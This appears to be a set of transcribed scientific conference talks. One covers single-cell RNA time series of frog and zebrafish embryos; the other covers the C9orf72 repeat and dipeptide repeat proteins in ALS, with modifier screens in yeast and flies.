Right, so this is supposed to be the title of my short talk. I thought I would start by introducing myself and telling you why you might want to catch me later and talk to me about the miscellaneous things that I do. I'm kind of a weird species of scientist; you'll see why. Perhaps I'm most interesting not as a scientist at all, but as a guinea pig: I think I can substantiate the claim that my own genome is the best characterized human genome on the planet, among genomes which are available. It's been selected by the American National Institute of Standards and Technology to serve as a standard genome, and if that piques your curiosity, I'm happy to say more. This is the cover of my dissertation, which was done in the field of machine learning and artificial intelligence, and you see that nowhere does it talk about biology. Maybe my best-known contribution, from the machine learning point of view, to biology is this paper, of which I'm a lead co-author, and I'm happy to say it's been cited something like 7,000 times in seven years. Pretty good. Rudy, and I think a couple of other people, mentioned the system PolyPhen. In 30 seconds: this is a server and method which takes a human protein and tells you whether a given amino acid substitution is going to change the function of that protein. It's the most used system of its kind. I can tell you it's only slightly better than a coin flip, but it's the best. At some point, still being a machine learning guy, I ran into Marc Kirschner, whom I believe most of you know, and he suggested I come to the department, spend a few months, and find applications for machine learning. It's been many years; I'm still at the Department of Systems Biology at Harvard Medical School. And I actually do some of my own experiments, which all look very much the same. I do in vitro fertilization, usually with frogs, sometimes other species, and I stand there with a stopwatch, very carefully timing and killing embryos at certain points, and then I ask what they are made of, RNA, protein, other molecules, and try to reason about the system. This is, I think, a two- or three-year-old story now, but I just wanted to give you a glimpse of it. There are two interesting points here which are going to become relevant later. If there is a system where, for several time points, you measure RNA and protein in parallel, then just from those measurements alone, with no isotopic labeling, you can fit a simple two-parameter model and recover the synthesis rate and the degradation rate (a minimal sketch of this kind of fit follows below). And we've done this at genome scale at that point, and we are redoing it now. I don't think I need to tell you that synthesis and degradation rates for proteins genome-wide are important and useful in many ways. One kind of systems embryology application that I'm proud of: I don't think there are many questions in biology where you can ask a question which results in a number. So here's the question. If I take an embryo, which by this stage is a tadpole, a swimming, breathing, fish-like thing with a beating heart, I put it in the mixer, I reach in and take out a molecule of protein: was this molecule synthesized in the embryo, or was it deposited by the mother? And this graph here gives you an answer: 50 hours after fertilization in this organism, about 30% of protein molecules are made new.
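Editorial sketch of the two-parameter idea just mentioned, assuming the simplest kinetic model dP/dt = k_syn * R(t) - k_deg * P(t), where R(t) is the measured RNA level and P(t) the measured protein level. The model form, the toy time series, and the fitting choice are all assumptions made for illustration, not the lab's actual pipeline.

    # Sketch: recover synthesis and degradation rates for one gene from
    # matched RNA and protein time courses, assuming dP/dt = k_syn*R - k_deg*P.
    import numpy as np
    from scipy.integrate import odeint
    from scipy.optimize import least_squares

    t = np.array([0.0, 2.0, 4.0, 6.0, 8.0, 10.0])        # hours post fertilization (toy)
    rna = np.array([1.0, 1.2, 1.5, 1.4, 1.1, 0.9])       # toy RNA measurements
    protein = np.array([2.0, 2.3, 2.7, 3.0, 3.1, 3.1])   # toy protein measurements

    def rna_at(time):
        # Interpolate the measured RNA so the ODE can be evaluated at any time.
        return np.interp(time, t, rna)

    def simulate(params):
        k_syn, k_deg = params
        dPdt = lambda P, time: k_syn * rna_at(time) - k_deg * P
        return odeint(dPdt, protein[0], t).ravel()

    def residuals(params):
        return simulate(params) - protein

    fit = least_squares(residuals, x0=[0.1, 0.1], bounds=(0, np.inf))
    print("k_syn = %.3f per hour, k_deg = %.3f per hour" % tuple(fit.x))

In practice this fit would be repeated gene by gene across the genome-scale data; that loop is omitted here.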
So this 30% number tells you something about the system: how the embryo pre-deposits protein versus making protein on the fly, different proteins specialized for some cell type versus housekeeping, and so forth. How do you measure the new... I'm sorry? How do you measure the new protein? That will take me about an hour to explain, so yes, please come to my poster for that. Then, I've been fortunate to be part of the team that developed the so-called inDrops, a droplet barcoding protocol which allows you to look at expression of RNA at the single-cell level. When you take a system and you get a mixed population of cells, what comes out of this experiment, whichever method you do it with, is a giant matrix of cells by genes. What you do with it is a big question. You could try to reason about clusters in this population, but they're not necessarily clusters. You could try to reason about the whole manifold, but what kind of manifold? Those are questions which are ripe for mathematics, I think. We were very lucky to get Caleb Weinreb, the student who developed the system for representing such data that really enabled this field, I could say. The first mental image I ask you to take in is a system called SPRING, where every point is a cell, and two cells which are very similar in the space of gene expression are linked by a spring. It relaxes and becomes a manifold representing something. So what did we do with these tools? We went back to my favorite kind of experiment: we just took time points of a developing embryo and stuck them into the single-cell profiling setup, and I must say this was teamwork between two very talented students and two lab heads. You get this sort of data. What does this massive slide tell you? There are 10 time points in development, where each time point has many thousands of cells. It's a giant data set, I think probably the biggest of its kind to date, of 130,000 individual cells. What do we do with this data? One idea is that you take adjacent time points and connect them into a developmental tree. Very roughly it works like this: you start at the last time point, you take a state, you choose a parent state in the previous time point, and then you iterate; that gives you a tree (a minimal sketch of this idea appears below). That's great, and the tree is very helpful. But you can also take all 130,000 cells, put them into SPRING, and get this kind of manifold representation. Now we could stop doing embryology and just work with this data, because if you think about it, all sorts of reverse engineering of biology can come out of this data set, and this is what I'm going to be busy doing for the next 15 years, I think. First, there's the time dimension: you could see that a stem cell starts somewhere here and then, a few hours later, goes out on the bridge and differentiates. You can ask which genes are important. You can reconstruct cascades of transcription factors and so forth. You can look at a branching point and ask how decisions are made. You can simply ask which genes co-vary, which are absent and present together; you can begin to get all sorts of systemic information, like protein complexes, out of this. Finally, thinking back to the beginning of my talk, you can use synthesis and degradation rates to turn RNA, which we can measure, into protein, which we cannot, and will not be able to, measure at the single-cell level for decades, probably. So with this in mind, we thought, well, we could spend 15 years analyzing this data, but it's already a very rich resource.
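Editorial sketch of the two data-structure ideas just described: the SPRING-style k-nearest-neighbor graph over cells, and the coarse state tree built by clustering each time point and linking each cluster back to its most similar cluster at the previous time point. The clustering method (k-means), the neighbor count, and the toy matrix are assumptions for illustration, not the published pipeline.

    # Sketch: (1) kNN graph over cells in gene-expression space (SPRING-style),
    # (2) coarse tree linking states at time t to a parent state at time t-1.
    import numpy as np
    from sklearn.neighbors import kneighbors_graph
    from sklearn.cluster import KMeans

    rng = np.random.default_rng(0)
    n_cells, n_genes, n_stages = 300, 50, 3
    X = rng.poisson(1.0, size=(n_cells, n_genes)).astype(float)  # toy cells x genes matrix
    stage = rng.integers(0, n_stages, size=n_cells)              # toy time-point label per cell

    # (1) Each cell is a node; edges connect it to its k most similar cells.
    knn_graph = kneighbors_graph(X, n_neighbors=5, mode="connectivity")

    # (2) Cluster each time point, then walk backwards in time, assigning
    #     each cluster the closest cluster centroid at the previous time point.
    clusterings = {s: KMeans(n_clusters=4, n_init=10, random_state=0).fit(X[stage == s])
                   for s in range(n_stages)}
    edges = []
    for s in range(n_stages - 1, 0, -1):
        for child, centroid in enumerate(clusterings[s].cluster_centers_):
            dists = np.linalg.norm(clusterings[s - 1].cluster_centers_ - centroid, axis=1)
            edges.append(((s - 1, int(np.argmin(dists))), (s, child)))

    print(knn_graph.shape)  # sparse cell-cell adjacency used for the force-directed layout
    print(edges)            # parent -> child links forming a coarse developmental tree

A force-directed layout of knn_graph would then produce the SPRING-style picture; that visualization step is not shown here.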
Just a month ago, I organized what we called a single-cell jamboree. HHMI generously sponsored this meeting, where we invited 26 mostly very senior people in the field of embryology, specifically frog embryology, to come, be trained to use our tools, and look at this data. So what is that? There were jamborees for genomes, when people had just sequenced Drosophila, for example, and worked to understand what the genes mean. This is the first ever similar effort, where experts in kidney and blood and neurons went and said, all right, I recognize some genes, I don't recognize others, annotated the data, and gave us bona fide sets of cells which are differentiated or differentiating. Again, in itself this is going to be a very rich resource. Very briefly, the whole effort was organized like this: this is our tree, a giant poster that we had on the wall there, and each expert received a small subtree, took all of the cells, tens of thousands of cells, just between two adjacent time points, popped that substructure out in the browser in order to understand that particular snapshot in the process of differentiation, and wrote a short essay about it. What are the recognizable markers, what are novel markers, are there any new cell types? That sort of information falls out of it. As if the frog data were not enough, we compared this whole tree in frog to a matching effort, also from our department, in zebrafish, and asked about conservation: are cell types conserved, are the same genes used in the same way in this process, do cell types fall out of the tree through the same route, and so forth? Again, there are some surprises here. So at this point, I think it's clear that with all of this information, my talk looks to you like a paper of the kind that, unfortunately, I think has become too popular in major journals now. I call it: revolutionary technology enables unprecedented deep and expensive data set which confidently reveals a new depth of our ignorance about embryogenesis. I would appreciate a chance to convince you otherwise, but that will take some time and effort at the poster. Today. In 15 years? You want to give me 15 years to do it. Right, so I think I can open for questions. So on your previous slide, was the zebrafish and Xenopus data independently processed; in other words, are they independent trees? I don't understand the question: independently dissociated, independently collected, independently run through the setup? Oh, yes, absolutely independently analyzed, through the process which I sort of illustrated here. You just cluster every time point, from the marker genes in each cluster understand which cell type it is, and connect backwards in time, and you get two trees. So both trees show a perhaps surprising characteristic of very early divergence; in other words, there's... This was one of the surprises. Absolutely right. There was a huge effort by the community to create this kind of ontology, and we compared: mostly consistent, but many cell types look to be emerging much earlier than we thought. One of the goals of the new Chan Zuckerberg Initiative is to build the Human Cell Atlas, to find all the cell types in humans, and it seems to me maybe you've already done that for Xenopus and zebrafish? Yes, I think so. Also, mind you, they're working with dead people, which creates a certain bias in the cell types. So how many cell types? I guess it depends how you define a cell type. This is Kirschner's question.
I really hate it. This is like asking how many colors are there. Right, you can zoom in and things would cluster and cluster some more and cluster some more, depending on which genes you would look at. So you can very rapidly get lost in this universe of representation. So I don't think it can be defined rigorously. We are talking about 300 cell types. Mind you, this is early development. This is gastrula to neurula. And so there are probably thousands of cells we never see in this. Thousands of cell types we don't see here. So how do you know the linkage between the cells? I didn't get that. At different stages, how can you link them? So about any two cells, or any two groups of cells, you can just ask, are they similar in the space of gene expression? So you just say this sample, which was taken two hours later than this sample, contains a few cells which look a lot like these cells, yet different. And that's how you make this decision. So in this analysis, you lost the location of the cells in the embryo, right? Yes, we did. Is that important? It's super important. There are several labs aggressively working on ways to inject a plasmid which will allow you to reconstruct the true lineage by barcoding, but it is lost in this data. You can recover a lot of it because there is a very rich set of in situs for these embryos. And so, just going by markers, you could register the cell, based on its expression profile, using several in situs. So let's suppose that you're having an asymmetric division. You have asymmetric divisions going on already at this stage. So how could you, how do you know, since it's asymmetric, the properties are also asymmetric, so how can you link them to the common parent? I don't think we can do it perfectly. I mean, this is a good example of things we're not going to see until we sequence deeper, and I also don't take samples two hours apart. I take samples, you know, maybe 20 minutes apart, so that they have enough cells which are similar enough. I think that's what it boils down to. Right? I don't believe that asymmetric division will create two cells which are completely different from one another. Most of the genes are probably going to be similar, yet there are going to be principal differences in transcription factors and signaling molecules. Maybe not. So why did you pick Xenopus and not Drosophila? In Drosophila you can actually back everything with genetic analysis. It's impossible to do genetics in Xenopus. It's only descriptive. Well, I can give you... We can do genetics in Xenopus. Would you like a polite or an honest answer? Can we have an honest answer? Okay, seriously speaking, large cells are important. We're looking only at about, let's say, 1 to 5% of the transcriptome. The rest is getting lost in the pipes. And so, giant cells. One important reason. You can do morpholinos and CRISPR knockouts in Xenopus. You can do a lot. I don't think Drosophila is in any way superior to Xenopus, but that's me being a groupie. Do you think, when you're dissociating the cells, how does that impact the profiles? I could talk for hours about the adventures of finding a dissociation protocol. So that's very important. I think it introduces very little bias. And we had to work it out three times. It took a year to work out in the three different species that we've done. I didn't mention the third species at all. But a brief answer is, you dissociate rapidly and within minutes everything is on ice. So most of the processing happens on ice. There is probably some response, but...
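As a toy illustration of the "register cells back to space using in situs" idea mentioned in the answer above (this is not the pipeline actually used for the frog data, and all names and numbers here are hypothetical): binarise a panel of in situ patterns, binarise a cell's expression of the same markers, and assign the cell to the region where the agreement is highest.

```python
import numpy as np

def map_cell_to_region(insitu, cell):
    """insitu: regions x markers boolean matrix (does region express the marker?);
    cell: boolean vector saying which markers are detected in one cell."""
    agreement = (insitu == cell[None, :]).mean(axis=1)   # fraction of markers that match
    return int(agreement.argmax()), agreement

# Toy example: 4 spatial regions, 6 marker genes (values invented for illustration).
insitu = np.array([[1, 0, 0, 1, 0, 1],
                   [0, 1, 1, 0, 0, 0],
                   [1, 1, 0, 0, 1, 0],
                   [0, 0, 1, 1, 1, 1]], dtype=bool)
cell = np.array([1, 1, 0, 0, 1, 0], dtype=bool)          # markers seen in one cell
best, scores = map_cell_to_region(insitu, cell)
print("best region:", best, "agreement per region:", scores.round(2))
```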
So I realize your analysis is in progress, but can you give us a little bit of a flavor for... You should start seeing blood. I'm not supposed to say this, but I think it's coming out in science pretty soon. Okay, so what's the difference in your map versus the classical hematology? As far as it's... Classical hematology? Well, as far as the differentiation of various lymphocytes, subtypes and such. Well, we're not that far in development at all to even begin to see those things. There's classical Xenoposatlas, which we did compare to and as I mentioned, it matches beautifully, surprises mostly in terms of how early things begin to be defined. I guess I don't know what stage 22 means. Oh, there was a little picture there. It's a little fish which... How are we seeing your hematobiology? It's sort of like a little fish-looking sausage, which has not even gotten its first heartbeat. So how early can you see no one differentiation, brain differentiation? You ask about brain differentiation? Yeah. How early... When do you start to see it? Depends on your definition of brain. You have a lot of types of neurons where we recognize familiar markers. But all of this is RNA. And so if you want to know about the functional thing, I cannot say anything yet, but we do see at the latest stage types of neurons. So if you go to the poster, I'll zoom in with you and look at different neural types. You said between the two, you have around 5% of transcriptome measured in the two species. How much disease... No, I'm saying every single cell shows me about 1 to 5% of RNA molecules in the cell. The rest is lost. But as soon as I've taken several cells of a certain kind and averaged, I have a very good representation. Okay. And comparing the two species, how much this transcriptome is shared at different stages? I mean, first of all, something I really don't like to admit is that zebrafish has much smaller cells, but seem to show us high percentage for every cell. You are asking how similar is the expression across tissues? To my taste, we can discuss a million metrics of this comparison, but to my taste, it's a surprisingly not conserved. You recognize what you recognize, markers for cells for neurons and muscle, but those are the ones we have been studying for 20 years because they show up everywhere and very easily. But if you dig a little deeper, there's, to my taste, again, very little conservation. What is the minimum number of cells that you need for this analysis? Tough question, I don't know. Thousands? That's it? Well, we did the first round of analysis with 50,000 across 10 stages. We've seen much more when we added another 80,000. So I don't know how to think about the minimum. No, because this could change the data, depending how many cells you have, because when you have a small number of cells, you lose some of the cells with certain signatures. Absolutely. Right. So, that's retrospectively, after we have done 10 million cells, we will know how things change. Okay, you were supposed to go further and all questions could be asked during the panel discussion. So maybe... Actually, yeah, the short talks are meant to just draw people to the posters. And we can continue... Yes, of course, continue discussion during the final session or post-processional other way, and we will move to the next speaker.
|
The dynamics of gene expression in vertebrate embryogenesis at single cell resolution Time series of single cell transcriptome measurements can help us reconstruct the dynamics of cell differentiation in both embryonic and adult tissues. We produced such a time series of single cell transcriptomes from whole frog embryos, spanning zygotic genome activation through early organogenesis. From the data we derive a detailed catalog of cell states in vertebrate development, and show that these states can be assembled into temporal maps tracking cells as they differentiate over time. The inferred developmental transitions recapitulate known lineage relationships, and associate new regulators and marker genes with each lineage. We find that many embryonic cell states appear far earlier than previously appreciated, and assess conflicting models of vertebrate neural crest development. By further incorporating a matched time series of zebrafish from a companion paper, we perform global analyses across lineages, time, and species, revealing similarities and differences in developmental gene expression programs between frog and fish.
|
10.5446/50893 (DOI)
|
Thank you very much for the introduction. And also thank you very much for inviting me. It's a pleasure to be here. I think it's the first time that I'm in a meeting where I don't know anyone. I didn't know anyone. Yeah, I didn't know. But I'm learning to know people more and more. So for those that still stay till the end, I quickly want to say where Leuven is. So Leuven is a university town close to the capital of Belgium, to Brussels. Brussels does not really have a big university. So the biggest university of Belgium is in Leuven. I'm not from Ghent, as is indicated on my name tag. Ghent is somewhere here. So it's closer to the seaside. And so now we are sitting somewhere here. This is France. So you should know Leuven, or at least that's what I hope, you should learn to know Leuven from the historical things. There's a lot to see in Leuven. So whenever you're in Belgium, just give me a call or an email. So I will guide you around. It's a very old university. It's one of the oldest universities on the continent. And if you don't know Leuven from the research or from the students, you should know Leuven from the beer. Stella Artois is from Leuven. And the combination of beer and students is apparently a perfect combination. OK, so that's the introduction. What I want to show you today is what aging is doing to our population. So especially the Western population is becoming older and older. It's also increasing. The number of people is increasing. And what you see here in the red dashed line is the number, or the percentage, of people over 60 that we will have over time. And you see that more than 20% of the population in 2050 will be over 60. More older people also means that there is much more neurodegeneration. And neurodegeneration will come with a cost. And so what is shown here is a simulation of what it will cost society if we all become older and if we all start to suffer from neurodegenerative disorders. There is no cure for any of these disorders. And one of the reasons that there is no cure is an insufficient understanding of the pathogenic mechanism, of the etiology and the pathogenesis of these diseases. And that's why I think we need to do a lot of research on these diseases. This is a slide showing what happens in a number of these neurodegenerative disorders. They are different in the sense that they affect different regions of the brain. They're also different in the aggregates that are formed in these different regions. And today I would like to focus on one of these neurodegenerative disorders. It's called ALS, Amyotrophic Lateral Sclerosis. And that's the disease that we are studying in the lab. What is ALS? ALS is a motor neuron disease. It selectively affects motor neurons, and we have two types of motor neurons. We have the motor neurons that are in the motor cortex, the upper motor neurons. And these upper motor neurons connect with the lower motor neurons. And the lower motor neurons are in the brainstem and in the ventral horn of the spinal cord. These lower motor neurons, the ones that are in the brainstem, connect to the facial muscles and the muscles that you need for swallowing. And the lower motor neurons in the spinal cord go to your arms and to your feet. So legs and feet. And so, yeah, those are the ones you need for voluntary movements. But also the ones that you have here, you need them to talk. So what happens if these motor neurons start to degenerate? You cannot move around anymore and you cannot talk anymore.
So which means you're in some kind of a locked in state. So you cannot communicate anymore with your environment. The consequences of this dramatic disease, well, it's a very dramatic disease because you die from the disease usually two to five years after the detection of the first symptoms. It's a rare disease. Having said that, at this moment, there are four to five million people running around on the world that will die from ALS. So it's, yeah, it's lethal. So the incidence, just to give you another number, the incidence is the same as the incidence of multiple sclerosis, which is a disease that is much better known. There are also many more MS patients running around, but that's because they don't die from the disease. So it's an incidence between two to four per 100,000 per year. So what are the first symptoms? First symptoms are benign. So spasticity and hyperreflexia, atrophy of skeletal muscles, and then, as I already said, loss of speech, and also people get paralyzed. And there is no cure. So it's a dramatic disease without a cure. What is also important to know is that in 10% of cases, it is an inherited disease. So in 10% of cases, there are more family members that have suffered from the same disease, which means in 90% of diseases, we have no clue what the cause is. So that's an open question. So in these 10% of familial patients, we know in almost 80% of cases what the underlying genetic cause is. And I've here indicated the most important ones. I will come back to these genetic causes in a minute. What I also would like to point out is that what the pathology of these diseases, I told you in the beginning that every disease has typical aggregates, every neurodegenerative disease has typical aggregates. In the case of ALS, 95% of patients have mislocalized TDP43, which aggregates. So it's mislocalized in the cytoplasm. Usually, normally, TDP43 is a nuclear protein. But in the disease cases, TDP43 is mislocalized in the cytoplasm. And in the other cases, it's SOD1 or FUS. OK, so what is our goal is to understand the initial steps of the disease. And the major question we would like to answer is, how do these mutations that we know, how do they result in the pathology? And one of the things that I've just indicated is that mislocalization of that protein called TDP43. We hope, sorry? Yeah, it's an RNA-binding protein. So it has a role in RNA transport, in DNA damage, rescue against DNA damage. So it's quite well known what it's doing. It's less well known. Well, it's unstructured. Yes, so it has low complexity domains. And I will come back to that later during my talk, because that's important. So we hope that by studying the underlying mechanism that we can find also therapeutic targets. What I also would like to indicate that is that there is a lot of variability in a family, for instance, with the same mutation. The example I've taken now is mutation in another gene, superoxide dismutase 1. It's the enzyme that we all need to get rid of our free radicals to down-regulate oxidative stress. That's a genetic cause that is already known for a long time, more than 20 years. And so we have in Belgium patients with the mutation in SOD1. And you can see that the disease duration varies from two years to 20 years. So patients belonging to the same family have a difference in disease duration that is so significant and so dramatic. And there again, what we want to know is why is that? So which factors, which modifiers are responsible for that major difference? 
And again, if we know these modifiers, we can also try to develop therapeutic targets against these modifiers. By the way, there are exceptions to the rule that patients die after two to four years. And you all know one person: Stephen Hawking has ALS. But he has an atypical form of ALS. He has already had the disease for 30 years. So he's stabilized in a far advanced stage. Nobody knows why. But nobody knows the mutation. No, no. He has a sporadic form. But that doesn't matter. So also in the sporadic forms there is a lot of variation. The sequencing was done. Yeah, yeah, yeah. Well, he does not have a genetic cause of ALS, like in 90% of cases. Stephen Hawking also illustrates another aspect of the disease. Cognitively, these patients are still OK. So only the motor system fails. Only the motor neurons die. Sorry. So that's just to illustrate that there is a lot of variation in the disease. I want to come back to one of the genetic causes of ALS. And it's a very special one. We have already heard about repeats in genes when there was a talk about fragile X. There is also a gene causing ALS that contains repeats in a non-coding sequence. It's also a non-coding sequence. It's C9orf72. Why is it called C9orf72? It's located on chromosome 9. It's an open reading frame. It's called number 72. So nobody really knows what the gene product of this open reading frame actually is. The repeat is a hexanucleotide repeat. Four Gs, two Cs. So GGGGCC. Normally, well, I hope that we all have two to eight, maximum eight, of these repeats. In patients, you have hundreds and several thousands of these repeats. And it's located, like I said, in a non-coding region. If you develop disease, it's because a mutation has happened? Yeah. When you have such a large expansion of that hexanucleotide repeat, you will get the disease. The only thing you don't know is when. But earlier, before you started, they hadn't been checked before they had developed disease. Yeah, yeah, yeah, yeah. You can do that now, because now we know what the cause of the disease is. Now indeed, we have pre-symptomatic carriers. We have families where we know that there are patients that have the repeat and that will get the disease sooner or later. It's important because now we can look much earlier at what is going wrong in these patients. Well, we should not call them patients. At that moment, they are not yet sick. So the big discussion in the field now, and, well, I think most people working in ALS are shifting to the hexanucleotide repeats in C9orf72, is how do these hexanucleotide repeats cause ALS? And there are different possibilities. I will come back to that in a minute, but there is another thing I have to tell you. And that is that these repeats are translated. They are translated in a non-ATG mediated fashion. So there is no ATG in this repeat, in this intron. But despite that, they are translated. And not only is the sense RNA formed, the antisense RNA is also formed. And so, because it's a hexanucleotide repeat, and because there is no ATG, they can be translated in every reading frame. So theoretically, that means that there are six potential dipeptide repeat proteins. But because one is shared, the GP is translated both from the sense and from the antisense strand, we have five different dipeptide repeat proteins that can be translated from this repeat in a non-ATG mediated fashion. Do you know which is the polymerase? No, not much is known about that.
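To make the frame counting concrete, here is a small sketch that translates the sense (GGGGCC) and antisense (GGCCCC) repeat RNAs in all three reading frames. It says nothing about how RAN translation actually initiates; it only shows why six frames collapse to five distinct DPR species (conventionally written poly-GA, poly-GP, poly-GR, poly-PA and poly-PR), with GP shared between the two strands.

```python
# Hypothetical illustration only: enumerate the dipeptides encoded by the C9orf72
# repeat in each reading frame of the sense and antisense transcripts.
CODON = {"GGG": "G", "GGC": "G", "GCC": "A",
         "CCG": "P", "CCC": "P", "CGG": "R"}    # the only codons that occur here

def frame_dipeptides(repeat_unit, n_units=20):
    """Translate n_units copies of the repeat in all three frames and return the
    repeating dipeptide unit of each frame."""
    rna = repeat_unit * n_units
    dps = []
    for frame in range(3):
        codons = [rna[i:i + 3] for i in range(frame, len(rna) - 2, 3)]
        aa = "".join(CODON[c] for c in codons)
        dps.append(aa[:2])                      # unit of the poly-dipeptide
    return dps

def canonical(dp):
    # "GA" and "AG" describe the same repeating polymer; keep one spelling
    return min(dp, dp[1] + dp[0])

sense = frame_dipeptides("GGGGCC")              # expect GA, GP, GR
antisense = frame_dipeptides("GGCCCC")          # expect GP, AP (= poly-PA), PR
print("sense frames:    ", sense)
print("antisense frames:", antisense)
print("distinct DPR species:", sorted({canonical(d) for d in sense + antisense}))
```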
So now, well, they are now investigating how it actually works. Well, in the beginning, there was even a discussion, does this happen in the nucleus or in the cytoplasm? Well, it's a lot of investigation. Yeah, yeah, yeah, yeah, indeed. And so is it cap dependent or cap independent? They know mechanisms now. They know what they, you know, it's still not published. Oh, OK, yeah, well. They don't know. Yeah, yeah, yeah, but I mean, that's not what we are doing, actually. But indeed, it is important to know how this works because it's also happening in other repeat diseases. Also in Huntington, there is also, there are also repeats and they are also translated and the translation seems to be upregulated under stress. So cells under stress, they increase this non-ATG mediated RAN translation, is it called? OK, large amounts, I mean. Well, that's a, that, well, nobody. And you can detect it in the CSF and in the blood. You can also find them back in pathological material. It's not really known how much of these proteins you have. The concentrations, well, vary. It's also, there's also not a very good correlation between the place, for instance, where they find these aggregates and where you have the motor neuron that. So there is some kind of a discrepancy there. So there is still, there are still a lot of open questions, but yeah, these repeats were only discovered six years ago, five, six years ago. So it's relatively recent. So. What's the tissue specificity of these? It's present in every tissue. Well, you mean the DPR production? Yeah. It's mainly in neuronal cells that you can find them, but also in astrocytes. So it's, but not in, as far as I know, not outside of the CNS. But there are a lot of things that basically are appearing. Yes. At the onset or astrocytes in the ALS, right? That's happening late in. This happened. Well, that's, that's of course a problem. You can only, well, you can see it in the CSF and in the blood already at disease onset. And that's why these people that have the repeat, but that are not yet sick, why they are so interesting. But the fact is that most of them are still not sick. I mean, but in like, let's say five, 10, 15 years, some of them will develop a disease. And well, we are following them now already. So we will see when, for instance, these DPRs show up, which was previously only possible in patients when they were already sick, or when you have to look, well, postmortem material. Yeah. That will always be the same. It's at the end of life. So that's, that doesn't make much of a difference. But in, for biomarker research, you can now go much earlier to detect what shows up. Okay. So we focused on the DPRs. That's why I introduced them so extensively. And before I go on and focusing on these DPRs, I would like to give a little bit of a broader picture in the sense that it's still not yet known whether it is due to loss of function or due to gain of function that these repeats cause ALS. Although there are a lot of arguments that it's not just loss of function. I'm not saying that loss of function couldn't play a role, but it doesn't seem to play a major role. So the expression of C9 or 72, for instance, seems to be quite similar in patients and in controls. And then there are two gain of function mechanisms proposed. There are RNA foci seen in the nucleus, and these RNA foci, they contain these repeats, these hexanucleotide repeats, and they also bind RNA binding proteins. 
And so maybe by doing that, they deplete the nucleus from some essential RNA binding proteins. So that could be a gain of function. And then the other gain of function is what I just described is that RAND translation, the production of these DPRs that you usually don't have, and that can become toxic. What have we done when these repeats were discovered and when DPR translation was suggested as being important? We have made constructs where we have introduced an ATG in front of a sequence, and we used the wobble positions to create a coding sequence that doesn't contain the repeats. And these constructs also, they only express one of the DPRs, because that's a problem when you just express, for instance, these repeat RNAs in cells. You don't know what actually is translated from them, so you will have a mixture of all of them. So what we have now is constructs with just one of the DPRs expressed. And these constructs don't form RNA aggregates, for instance. So we used these constructs to find out which mechanisms are responsible for DPR-induced motor neuron that, and the story I would like to share with you, the first story I would like to share with you, is the role of nucleosytoplasmic transport that we discovered a few years ago. This was done both in yeast and in flies. And so in yeast you have an inducible system, so you can turn on the expression of the different DPRs. And so then you have a dilution test, so you dilute and you see how many of the yeast colonies survive. When you turn on the expression of the arginine containing the GR and the PR, then you can see, well, for instance, for the PR here, that there are no yeast cells growing. And also for GR you can see that the number of yeast that is growing, the number of colonies, is lower. While the other two that are tested here don't have any effect on survival. We did similar things in the fly eye, and so here is a control eye. It looks like a control eye, but in fact it expresses one of the DPRs, PA, and it doesn't show any defect. While when we express, again, an arginine containing DPR, you can see that the eye looks a bit sick. It's not only the eye that is affected when we just express, because in that case we only express the DPRs in the fly eye. We can also express the DPRs in the motor neurons or in the whole body. And what you see then is that the ones that, again, express the arginine containing DPRs that they have a shorter survival, whether these are females or males, it doesn't make a difference. And now that we have this system where we have clearly cell debt that is induced by certain types of DPRs, we can use that system to look for modifiers. Why is the arginine contained? Why is the arginine contained? That's a good question. If you replace it with lysine, will it do the same thing? No, the arginine is important. But again, I will try to give an answer. I'm not saying I know the answer, but we have some hints what could be... Before question, this is a piece that for all patients are only having this in the family. It's only for the ones that have the hexanucleotide repeats in C9 or C72. All patients have this. If you have the repeat, you have the DPR. If you have this disease, do you have necessarily repeat? No. No, no, no, no, no. Because... Yeah, yeah, yeah, yeah, yeah. So again, so only 10% is familial. And from the 10% of this familial, 60% have the repeats that I just occurred. The rest have no repeats, they may have developed diseases without repeats. 
The rest have other mutations in other genes, or mutations in genes that we don't know, but the majority, and that's important to know. The mutations of the same protein. Sorry? It means folding of the same protein. Well in the end, it's always Tdb43 that is found, and that is independent of whether it's genetic or sporadic. That's very important to mention indeed. So the pathogenic end result is always the same, independent of whether you have the repeat or whether you have no genetic cause or whatsoever. So that's indeed an interesting observation. And to be honest, we don't really know why that is. And I will come back to that also in the end. So now we have two models, yeast and fly, and we can use these models to screen from modifiers. So for instance, for the fly, we just have SIRNA expressing flies. For the yeast, you have deficiency strains, and you just mate them, you just cross them. And then you can see whether this improves the condition of the yeast, or whether it improves the eye of the fly, whether it has no effect at all, or whether it makes it worse. So that's a classical modifier screen that you can do in these organisms. And they have the advantage that all these lines are available. So it's relatively easy to do these screens. And so this is just an illustration of what it means to be better or worse. So this is the control condition where we just expressed the arginine containing DPR. Here is a modifier that makes it worse. Here is a modifier that makes it better. The same for the fly eye. This is what we normally see with some pigmented places in the eye. Here the pigmentation is much more pronounced. So this modifier makes it worse. Here you can see that it almost looks like the healthy eye. So this is a modifier that makes it better. Okay, so which modifiers did we find? And that's illustrated here. The modifiers that had the biggest effect had to do with or the nuclear pore, or the nucleosytoplasmic transport. And so these are a number of enhancers that all have to do with nucleosytoplasmic transport. Here are a number of suppressors that have to do also with nucleosytoplasmic transport. And also in the yeast screen, these modifiers were over-represented. So the genes that have a role in nucleosytoplasmic transport were over-represented in the modifiers, both in the enhancers and in the suppressors, which makes it more complex, of course. And so if I summarize a lot of work in one slide, so this is a representation of all the enhancers and all the suppressors that we have found, both in flies and yeast. So and in red, it's the enhancers, and it are mainly the constituents of the nucleosytoplasmic transport mechanism that are in the cytoplasm, while the suppressors are mainly localized in the nuclear pore. But don't ask me how they influence toxicity. That's something we are investigating now. It plays a role. The only thing we don't know is which role. I mean, that's more complicated to find out than we expect. So the protein in the infotain of the m-tore, which m-tore is this? That I don't know by heart. It's like R1GTP. What is it? Yeah. But there is another m-tore. I don't know. Yeah, here. Yeah. I don't know. I should check which one it is. So I don't know all the, I'm still learning how. The same name too many times. And these are, to make it even more complicated, these are the names of the fly genes. So I'm not sure whether it's the same m-tore. No, I don't think so. So these are the fly names. So I can check what it is in. 
